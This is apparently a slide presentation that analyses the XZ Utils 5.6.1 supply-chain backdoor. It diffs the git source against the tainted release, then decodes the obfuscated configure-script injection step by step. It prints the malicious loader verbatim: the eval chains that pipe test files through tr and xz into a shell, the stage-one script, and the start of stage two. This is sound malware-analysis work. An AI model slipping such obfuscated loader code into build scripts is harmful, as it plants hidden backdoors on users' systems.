Primary key fingerprint: 9001 B85A F9E1 B83D F1BD A942 F5BE 8B26 7C6A 406D
```
---
Extract the release source archive:
```bash
apt install lzip
```
```bash
tar_opts=(
# Specify to let the tar command run in file extraction
# operation mode
--extract
# Specify the tarball to extract
--file gettext-0.22.4.tar.lz
)
tar "${tar_opts[@]}"
```
Switch the working directory to the root directory of the GNU Gettext source tree:
```bash
cd gettext-0.22.4
```
---
Configure the software build:
```bash
./configure
```
```txt!
...stripped...
configure: creating ./config.status
config.status: creating Makefile
config.status: creating installpaths
config.status: creating po/Makefile
config.status: executing po-directories commands
```
```bash
/project/gettext-0.22.4# echo "${?}"
0
```
---
Build the software:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Reduce build time by running multiple build
# processes at the same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
```txt!
...stripped...
make[1]: Leaving directory '/project/gettext-0.22.4'
```
```bash
/project/gettext-0.22.4# echo "${?}"
0
```
---
Install the software:
```bash
make install
```
```txt!
make install-recursive
make[1]: Entering directory '/project/gettext-0.22.4'
...stripped...
make[1]: Leaving directory '/project/gettext-0.22.4'
```
```bash
/project/gettext-0.22.4# echo "${?}"
0
```
---
Verify the software installation:
```bash
gettext --version
```
```txt!
gettext (GNU gettext-runtime) 0.22.4
Copyright (C) 1995-2023 Free Software Foundation, Inc.
...skipped...
```
Return to the working directory:
```bash
cd /project
```
---
### Build XZ Utils's {software build configuration program|./configure}
Switch the working directory to the root of the XZ Utils source tree:
```bash!
cd xz-git
```
Build the {software build configuration program|./configure}:
```bash!
./autogen.sh
```
```txt!
...stripped...
+ sh update-po
po4a/update-po: The program 'po4a' was not found.
po4a/update-po: Translated man pages were not generated.
```
```bash!
/project/xz-git# echo $?
1
```
---
Query which Ubuntu package provides the `po4a` command:
```bash!
apt install apt-file
apt-file update
apt_file_search_opts=(
# Specify that the search pattern is a regular
# expression instead of a glob pattern
--regexp
)
apt-file search "${apt_file_search_opts[@]}" '/s?bin/po4a$'
```
```txt!
po4a: /usr/bin/po4a
```
```bash
apt install po4a
```
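
To see what the search pattern accepts and rejects, the sketch below runs the same regular expression through `grep` against a few sample paths. The paths are made up for illustration and are not real `apt-file` output:

```bash
# Sample package file paths (illustrative only)
sample_paths=(
'/usr/bin/po4a'
'/usr/bin/po4a-translate'
'/usr/share/doc/po4a/README'
'/usr/sbin/po4a'
)

# The same pattern as above: "/bin/" or "/sbin/", followed by
# exactly "po4a" at the end of the path
matched_paths="$(
printf '%s\n' "${sample_paths[@]}" \
| grep --extended-regexp '/s?bin/po4a$'
)"
echo "${matched_paths}"
```

Only `/usr/bin/po4a` and `/usr/sbin/po4a` match; the `$` anchor rejects longer command names and the `/s?bin/` part rejects documentation paths.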
---
```bash!
./autogen.sh
```
```txt!
...stripped...
+ sh update-doxygen
doxygen/update-doxygen: 'doxygen' command not found.
doxygen/update-doxygen: Skipping Doxygen docs generation.
```
```bash!
/project/xz-git# echo $?
1
```
---
Check which Ubuntu package provides the `doxygen` command:
```bash!
apt_file_search_opts=(
# Specify that the search pattern is a regular expression instead
# of a glob pattern
--regexp
)
apt-file search "${apt_file_search_opts[@]}" '/s?bin/doxygen$'
```
```txt!
doxygen: /usr/bin/doxygen
```
```bash
apt install doxygen
```
---
```bash!
./autogen.sh
```
```txt!
...stripped...
Stripping JavaScript from Doxygen output...
+ cd ..
+ exit 0
```
```bash!
/project/xz-git# echo "${?}"
0
```
---
### Generate the content difference between the source code in repository and the contaminated source release archive
```bash
diff_opts=(
# Exclude files that we have no interest in
# Software documentation
--exclude='ChangeLog' --exclude='doc'
# Internationalization(I18N) and Localization(L10N) files
--exclude='*.po' --exclude='*.pot'
--exclude='*.gmo' --exclude='po4a'
# The Git repository
--exclude='.git'
# Use the unified difference format to compare
# two tree's content differences
--unified --recursive
)
diff "${diff_opts[@]}" xz-git xz-5.6.1 \
>xz-vanilla-vs-tainted.diff
```
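
One detail that is easy to trip over: `diff` exits with status `1` when it finds differences, so a non-zero status is expected here and is not an error. The following sketch demonstrates this, together with the `--exclude` option, on two throwaway trees with hypothetical contents:

```bash
demo_dir="$(mktemp -d)"
mkdir -p "${demo_dir}/vanilla/doc" "${demo_dir}/tainted/doc"
echo 'echo configure' >"${demo_dir}/vanilla/configure"
echo 'echo configure # tampered' >"${demo_dir}/tainted/configure"
# The documentation differs as well, but we exclude it
echo 'old manual' >"${demo_dir}/vanilla/doc/manual.txt"
echo 'new manual' >"${demo_dir}/tainted/doc/manual.txt"

diff_opts=(
--exclude='doc'
--unified --recursive
)
# diff exits with 0 when the trees are identical, 1 when they
# differ, and 2 on errors
diff_status=0
(
cd "${demo_dir}" \
&& diff "${diff_opts[@]}" vanilla tainted >demo.diff
) || diff_status="${?}"

# Count the "+++ " header lines, one per changed file
changed_files="$(grep --count '^+++ ' "${demo_dir}/demo.diff")"
echo "exit status: ${diff_status}, changed files: ${changed_files}"
rm -r "${demo_dir}"
```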
---
![image](https://hackmd.io/_uploads/rJ2d0UhKC.png)
---
### The part where you should start to be suspicious:
![image](https://hackmd.io/_uploads/HyciEv2KC.png)
Line 18686 sets the `gl_am_configmake` variable's value to a weird command's output.
---
```bash
grep_opts=(
# Also match non-plaintext files
--text
# Use the Extended Regular Expression(ERE) syntax
--extended-regexp
# Recursively search all the sub-directories
--recursive
# Only print the filename that matches the regexp,
# instead of the matched lines
--files-with-matches
# Don't print out error message regarding read errors
--no-messages
)
# List the files in the source directory that contain a line
# ending with "four consecutive pound symbols, followed by five
# consecutive alphanumeric characters, followed by four
# consecutive pound symbols"
grep "${grep_opts[@]}" '#{4}[[:alnum:]]{5}#{4}$' xz-5.6.1
```
---
Running that command in a text terminal reveals the following output:
```txt!
xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz
```
So the whole command is equivalent to:
```bash
gl_am_configmake=xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz
```
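---
To see why the pattern only matches the marker line, here is a sketch that runs the same `grep` options against a throwaway directory. The file names and contents are made up for illustration.
```bash
demo_dir="$(mktemp -d)"
# A binary-looking file that ends with a marker line
printf 'junk\0bytes\n####World####\n' >"${demo_dir}/marked.bin"
# Four pound symbols, but not directly followed by five alphanumerics
printf '#### Heading ####\n' >"${demo_dir}/plain.txt"
grep_opts=(
    --text
    --extended-regexp
    --recursive
    --files-with-matches
    --no-messages
)
matched_files="$(
    grep "${grep_opts[@]}" '#{4}[[:alnum:]]{5}#{4}$' "${demo_dir}"
)"
# Print only the file name, the temporary path differs on every run
basename "${matched_files}"
rm -r "${demo_dir}"
```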
---
Line 18695 assigns a strange `tr` command to the `gl_path_map` variable:
![image](https://hackmd.io/_uploads/rJUeHDhF0.png)
---
`tr "\t \-_" " \t_\-"` ... what does this command do?
* Replaces tab characters with spaces
* Replaces space characters with tabs
* Replaces hyphen(-) characters with underscores(\_)
* Replaces underscores(\_) with hyphens(-)
Smells like obfuscation :-/
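---
A quick way to check that this `tr` invocation only swaps the two pairs is to run a sample string through it twice. This is a sketch with a made-up input; the `od` dump is there because tabs and spaces are hard to tell apart on screen.
```bash
swap_chars(){
    tr "\t \-_" " \t_\-"
}
original='foo-bar_baz qux'
swapped="$(printf '%s' "${original}" | swap_chars)"
restored="$(printf '%s' "${swapped}" | swap_chars)"
# The hyphen and the underscore trade places, the space becomes a tab
printf '%s\n' "${swapped}" | od -c
# Applying the same swap again undoes it
printf '%s\n' "${restored}"
```
Because the mapping is its own inverse, running the same command on the swapped data restores the original.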
---
Line 19878 assigns the output of a strange command to the `gl_localedir_prefix` variable:
![image](https://hackmd.io/_uploads/S1EyUwnY0.png)
```bash
gl_am_configmake=xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz
```
---
Replace "0 or more characters followed by a period symbol" with an empty string, which leaves only the text after the last period:
```bash
gl_am_configmake=xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz
echo $gl_am_configmake | sed "s/.*\.//g"
```
```txt!
xz
```
This variable is used to hide the usage of the `xz` command in the later commands.
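---
For comparison, the same "keep only the text after the last period" result can be had with a plain shell parameter expansion. This is just a sketch to show what the `sed` expression computes; the tainted script itself uses `sed`.
```bash
gl_am_configmake=xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz
# The greedy ".*" swallows everything up to the LAST period,
# so the periods in "5.6.1" don't matter
via_sed="$(printf '%s\n' "${gl_am_configmake}" | sed "s/.*\.//g")"
# "##*." removes the longest prefix that ends with a period
via_expansion="${gl_am_configmake##*.}"
printf 'sed: %s, expansion: %s\n' "${via_sed}" "${via_expansion}"
```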
---
![Diff snippet of the assignment of the gl_localedir_config variable](https://hackmd.io/_uploads/SJHXHu2F0.png "Diff snippet of the assignment of the `gl_localedir_config` variable")
Line 19895 assigns the following command to the `gl_localedir_config` variable:
```bash
sed \"r\n\" $gl_am_configmake \
| eval $gl_path_map \
| $gl_localedir_prefix -d 2>/dev/null
```
---
This command is then indirectly run by the shell in lines 24108 and 25632:
```diff
@@ -24104,6 +24152,7 @@
# Capture the value of LINGUAS because we need it to compute CATALOGS.
LINGUAS="${LINGUAS-%UNSET%}"
+gl_config_gt="eval \$gl_localedir_config"
_ACEOF
```
```diff
@@ -25629,6 +25682,7 @@
;;
esac
done ;;
+ "build-to-host":C) eval $gl_config_gt | $SHELL 2>/dev/null ;;
"src/scripts/xzdiff":F) chmod +x src/scripts/xzdiff ;;
"src/scripts/xzgrep":F) chmod +x src/scripts/xzgrep ;;
"src/scripts/xzmore":F) chmod +x src/scripts/xzmore ;;
```
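---
The double `eval` plus the pipe into `$SHELL` can be tried safely with a harmless stand-in. In this sketch `gl_localedir_config` holds a made-up command that merely prints a one-line script, and `sh` takes the place of `$SHELL`.
```bash
# Stand-in for the extraction pipeline: it PRINTS a script
gl_localedir_config='printf "%s\n" "echo hello from the hidden script"'
# Same indirection as in the tainted configure script
gl_config_gt="eval \$gl_localedir_config"
# The first eval runs "eval $gl_localedir_config", which runs the
# stand-in command; whatever it prints is then executed by sh
output="$(eval $gl_config_gt | sh 2>/dev/null)"
printf '%s\n' "${output}"
```
Nothing in the second hunk mentions the test file or `xz`, which is presumably the point of the indirection.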
---
This weird `sed` command: `sed \"r\n\" $gl_am_configmake`
![image](https://hackmd.io/_uploads/ryDzI_2YC.png)
is essentially `cat $gl_am_configmake`, so the whole pipeline becomes `cat $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null`
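---
Why does `sed "r\n"` behave like `cat`? The `r` command appends the content of the named file, and a file that can't be read is silently skipped, so the input passes through unchanged. A sketch with a made-up sample file, assuming GNU sed and that no file literally named `\n` exists in the working directory:
```bash
demo_dir="$(mktemp -d)"
printf 'first line\nsecond line\n' >"${demo_dir}/sample.txt"
# Run inside the throwaway directory so that the bogus
# file name given to "r" is guaranteed not to exist
via_sed="$(cd "${demo_dir}" && sed "r\n" sample.txt)"
via_cat="$(cat "${demo_dir}/sample.txt")"
if test "${via_sed}" = "${via_cat}"; then
    printf '%s\n' 'sed "r\n" printed the file unchanged'
fi
rm -r "${demo_dir}"
```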
---
After expanding all the variables:
```sh
cat xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz \
| tr "\t \-_" " \t_\-" \
| xz -d 2>/dev/null
```
```sh!
####Hello####
#U$
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
```
---
The following code sets the XZ Utils source tree path, which may not be the working directory that the build configuration program runs in:
```bash
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
```
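---
The `eval` on the `grep` output is a compact way to import a single variable assignment from another file. A sketch with a made-up `config.status` excerpt (the real file is a much longer shell script):
```bash
demo_dir="$(mktemp -d)"
# Hypothetical excerpt of a config.status file
printf '%s\n' \
    "ac_cs_version='demo'" \
    "srcdir='../xz-src'" \
    >"${demo_dir}/config.status"
# grep prints only the "srcdir=..." line, eval executes it
# as an assignment in the current shell
eval "$(grep ^srcdir= "${demo_dir}/config.status")"
printf 'srcdir is now: %s\n' "${srcdir}"
rm -r "${demo_dir}"
```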
---
The last portion of the script runs the following commands:
```bash!
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)"
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| eval $i \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
| /bin/sh
```
---
```bash
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| ((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939) \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
| /bin/sh
```
---
```bash
srcdir="xz-git"
xz_opts=(
# Decompress compressed data
--decompress
# Output decompressed data to the standard output
# device
--stdout
)
xz \
"${xz_opts[@]}" \
"${srcdir}/tests/files/good-large_compressed.lzma"
```
---
The consecutive `head` subshell commands simply:
1. Drop(>/dev/null) the next 1,024 bytes of the input stream.
1. Output the next 2,048 bytes of the input stream.
1. Perform steps 1 and 2 a total of 16 times.
1. Drop(>/dev/null) the next 1,024 bytes of the input stream.
1. Output the next 939 bytes of the input stream.
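---
The same drop-then-keep trick can be tried on a short string. This sketch uses made-up sizes (drop 3 bytes, keep 4) and assumes a `head` that reads exactly the requested number of bytes from a pipe, as GNU coreutils does; an implementation that reads ahead would lose data between the calls.
```bash
drop_and_keep(){
    (head -c 3 >/dev/null) && head -c 4 \
        && (head -c 3 >/dev/null) && head -c 4 \
        && (head -c 3 >/dev/null) && head -c 2
}
# Lowercase letters mark the padding to drop,
# uppercase letters mark the data to keep
result="$(printf 'xxxAAAAyyyBBBBzzzCC' | drop_and_keep)"
printf '%s\n' "${result}"
```
All the `head` processes share one standard input, so each one continues where the previous one stopped.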
---
Discards the bytes before the 31,233rd byte:
```bash
tail_opts=(
# Output the content starting with the 31233rd byte of the input file
--bytes +31233
)
tail "${tail_opts[@]}"
```
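---
Note the plus sign: `tail -c 4` prints the last four bytes, while `tail -c +4` prints everything starting with the fourth byte. A small sketch with a made-up ten-byte input (`-c` is the short form of `--bytes`):
```bash
sample='abcdefghij'
last_four="$(printf '%s' "${sample}" | tail -c 4)"
from_fourth="$(printf '%s' "${sample}" | tail -c +4)"
printf 'tail -c 4:  %s\n' "${last_four}"
printf 'tail -c +4: %s\n' "${from_fourth}"
```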
---
Translate the set of characters denoted using octal numbers to another set of characters:
```bash
tr \
"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" \
"\0-\377"
```
This is obfuscation that keeps the hidden raw LZMA1 stream from being noticed.
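---
The first set lists all 256 byte values in a shuffled order, so the command acts as a byte-level substitution cipher. A sketch with made-up sample input; `LC_ALL=C` is my addition to make sure `tr` works on single bytes:
```bash
shuffled='\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113'
# "L", "M" and "N" are bytes \114, \115 and \116, the first
# three entries of the shuffled set, so they decode to 0, 1 and 2
decoded="$(
    printf 'LMN' \
        | LC_ALL=C tr "${shuffled}" '\0-\377' \
        | od -An -tu1 \
        | xargs
)"
printf 'decoded byte values: %s\n' "${decoded}"
# Swapping the two sets gives the encoder; encoding and then
# decoding returns the original text
roundtrip="$(
    printf 'hello' \
        | LC_ALL=C tr '\0-\377' "${shuffled}" \
        | LC_ALL=C tr "${shuffled}" '\0-\377'
)"
printf 'roundtrip: %s\n' "${roundtrip}"
```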
---
```bash
xz_opts=(
# Decompress compressed data
--decompress
# Decompresses a _raw_ LZMA1 stream
--format raw
--lzma1
# Output decompressed data to the standard output
# device
--stdout
)
xz "${xz_opts[@]}"
```
---
Surprise, surprise! [Another shell script](https://pastebin.com/xvcM9V9x)!
```bash
P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
[ ! $(uname)="Linux" ] && exit 0
eval $zrKcVq
if test -f config.status; then
eval $zrKcSS
...stripped...
```
---
## I gave up \_:(´□`」 ∠):\_
There is a lot of stuff I need to catch up on to fully comprehend this script:
* C preprocessor directives
* GAWK
* GNU Automake
* GNU ld
---
## At least we still have the Internet
![Screenshot](https://hackmd.io/_uploads/rJSGlcbnA.png)
[research!rsc: The xz attack shell script](https://research.swtch.com/xz-script) by [Russ Cox](https://swtch.com/~rsc/)
---
## Integrated update mechanism to replace the backdoor payload
![Screenshot](https://hackmd.io/_uploads/rkTbB5-hR.png)
---
## Extraction logic of the malicious binary code
![Screenshot](https://hackmd.io/_uploads/H1X3N5-hA.png)
---
## Only targeting Debian and Red Hat distributions
![Screenshot](https://hackmd.io/_uploads/S11FBqZn0.png)
---
## That's all for today!
For step-by-step instructions to reproduce this work (up to the point where I gave up), check out my write-up:
| Write-up | This presentation |
| :-: | :-: |
| ![Loading...](https://hackmd.io/_uploads/Hy2wH2ZhC.png =300x300) | ![Loading...](https://hackmd.io/_uploads/BkynEhb2R.png =300x300) |
<center>Any questions?</center>
<style>
/* Enlarge the font size of ruby annotation text */
rt{
font-size: 15pt;
}
/* Don't limit the height of code blocks */
.reveal pre code{
max-height: 100%;
}
/* Work around the layout problem of lists */
.reveal .slides{
text-align: left;
}
/* Reduce the spacing between images */
:root{
--r-block-margin: 10px;
--r-heading-margin: 0 0 15px 0;
}
</style>